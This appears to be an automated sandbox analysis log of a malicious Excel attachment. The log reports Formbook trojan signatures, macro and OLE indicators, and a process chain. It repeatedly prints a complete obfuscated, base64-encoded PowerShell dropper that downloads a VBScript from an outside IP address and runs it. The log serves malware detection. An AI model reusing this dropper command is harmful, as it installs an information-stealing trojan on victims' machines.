Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B0F8EE	13_2_00B0F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AEF8C4	13_2_00AEF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF394B	13_2_00AF394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AF5955	13_2_00AF5955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B23A83	13_2_00B23A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6FBD7	13_2_00A6FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AFDBDA	13_2_00AFDBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A97B00	13_2_00A97B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00B0FDDD	13_2_00B0FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00AFBF14	13_2_00AFBF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A9DF7C	13_2_00A9DF7C

Document contains embedded VBA macros

Source: PI#0034250924.xla.xlsx

OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: PI#0034250924.xla.xlsx	Stream path 'MBd0019C635/\x1Ole' : https://og1.in/Ts9zje%kH2PtB@h']}kcoW8urgju7qSIyaY6rMfoRvqJjFI1MRxDhJ0cgZCOILDjTfxNUj50KG2ed9pKmaMFcHRLPB6jFvTt3m12GrIMTshxM4f1f2xwH0Kkfjk36FCfVkQuag2tuZ2peUDjVhwE8iqQxTFkHUBeJah92hLjWBFYZUL5ldm7b9N)BhA0<mXm'_
Source: F7A30000.0.dr	Stream path 'MBD0019C635/\x1Ole' : https://og1.in/Ts9zje%kH2PtB@h']}kcoW8urgju7qSIyaY6rMfoRvqJjFI1MRxDhJ0cgZCOILDjTfxNUj50KG2ed9pKmaMFcHRLPB6jFvTt3m12GrIMTshxM4f1f2xwH0Kkfjk36FCfVkQuag2tuZ2peUDjVhwE8iqQxTFkHUBeJah92hLjWBFYZUL5ldm7b9N)BhA0<mXm'_

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00A6DF5C appears 137 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00ADF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AB3F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00AB373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00A6E2A8 appears 60 times

PE file does not import any functions

Source: temp_exec.exe.11.dr

Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Yara signature match

Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: temp_exec.exe.11.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 12.2.temp_exec.exe.2bc9ae0.2.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 12.2.temp_exec.exe.8e0000.0.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@16/21@2/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PI#0034250924.xla.xlsx

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8E88.tmp

Jump to behavior

Source: PI#0034250924.xla.xlsx	OLE indicator, Workbook stream: true
Source: F7A30000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w..............D.......D......1D.....(.P.......D......3D......................j~.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................K..l....}..w.....j~.....\.F.......D.............(.P..... .......(.......8...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................K..l....}..w.....j~.....\.F.......D.............(.P..... .......(.......8...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@0p........l....@.o.....(.P..... .......(............... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P..... .......(...............8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...(...............F.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........................................j~.....}..w............@0p........l....@.o.....(.P..... .......(...............l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ........j~.....}..w............@0p........l....@.o.....(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................j~.............0.~':....Wl.....}..w....8.......@EE.....^...............(.P..... .......(.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................j~.................:....Wl.....}..w....8.......@EE.....^...............(.P..... .......(.......................................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PI#0034250924.xla.xlsx	ReversingLabs: Detection: 18%
Source: PI#0034250924.xla.xlsx	Virustotal: Detection: 23%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
